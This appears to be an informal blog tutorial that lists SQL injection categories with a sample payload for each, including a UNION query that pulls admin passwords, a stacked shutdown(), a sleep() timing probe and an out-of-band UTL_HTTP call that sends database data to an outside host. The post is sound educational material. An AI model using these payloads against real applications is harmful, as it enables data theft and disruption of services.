Do you know SQL Injection or you just think you know it?

That is the question with which the lecturer started. I wondered if I really know it too. So I am here writing what I know of SQL injection; maybe someone else could help me out with things that I get wrong or provide me with more insight into the topic.

Introduction

SQL injection is an attack in which the attacker passes SQL text from the client to the server, where it is executed as part of the application's own statement. If the injected statement executes successfully, it may result in a data breach, leaking information that the developer didn't intend to show. In addition, the attacker can insert, delete or update rows in the database as well.

SQL injection attacks can be divided into a few categories based on how the result of the statement execution is observed or on how the statements are formed. Below are the categories of SQL injection this article will look into.

  1. Tautologies
  2. Union Queries
  3. Piggy-back queries
  4. Timing attacks
  5. Alternative Encoding
  6. Out of band attacks
  7. Illegal/Logically incorrect Queries

Tautologies

This attack involves the use of a boolean condition that results in either an always-true or an always-false condition.

select * from users where username = 'abc' or 2 > 1 --'

The above example always evaluates to true, so every row in the table is returned.

Union Queries

Union queries work by combining the results of two separate queries, which may take data from different tables or views.

select * from users where userId = $id

The id value is manipulated by the attacker by appending a union query:

$id= 1 UNION ALL SELECT adminUsers, password FROM AdminUsers

This results in the following query:

select * from users where userId = 1 UNION ALL SELECT adminUsers, password FROM AdminUsers

which returns the combined result of both queries.

Piggy-back queries

Piggy-back queries are queries appended to an existing query, resulting in more than one query in the same statement.

select * from users where userId = 1; shutdown();

The above statement contains two queries; developers could check for this type of statement before the SQL statement is executed.

Timing attacks

Timing attacks are very helpful to an attacker when database and application error output is switched off; they are a form of blind SQL injection. In this type of attack the attacker appends a database timing function to the original query and verifies whether the timing function executed by measuring the server's response time. If the server responds immediately, the timing function did not run; if the response is delayed, the database is vulnerable to this type of attack.

select * from users where userId = 1; sleep(15);

Alternative Encoding

In this type of attack, the SQL text is encoded to avoid detection by defensive coding. These attacks are hard to detect, but some of the keywords and functions used in this approach can be identified. Each of the conditions below is a tautology written without the literal it compares against:

Select * from members where id=1 OR 'ABC' = concat(conv(10,10,36), conv(11,10,36), conv(12,10,36))
Select * from members where id=1 OR 'abc' = char(97,98,99)
Select * from members where id=1 OR ascii('a') = 97
Select * from members where id=1 OR ceil(pi())=4
Select * from members where id=1 OR floor(pi()*pi()+pi())=13

Out of band attacks

This is also a very helpful technique for a blind SQL injection attacker. The attacker uses DBMS functions to execute a command that opens an out-of-band connection, which carries the results to the attacker. For example, the attacker could use this technique to email user information out of the database.

select * from users where userId = 10||UTL_HTTP.request('testerserver.com:80'||(SELECT user FROM DUAL))--

Illegal/Logically incorrect Queries

This is also known as error-based SQL injection. This type of attack helps the attacker when other types, such as union queries, are not useful. It is also very helpful at the reconnaissance stage of an attack, where the attacker submits an illegal query to see the resulting output. The result may give information about the backend database system.

select * from users where userId = ' --

The above query results in an error message. To guard against this type of attack, the production database and application should have detailed error messages switched off.

………………………….

There is one more type of SQL injection called stored procedure injection. In this type of attack the parameters passed to a stored procedure are manipulated to alter its results.

Hope this article is informative.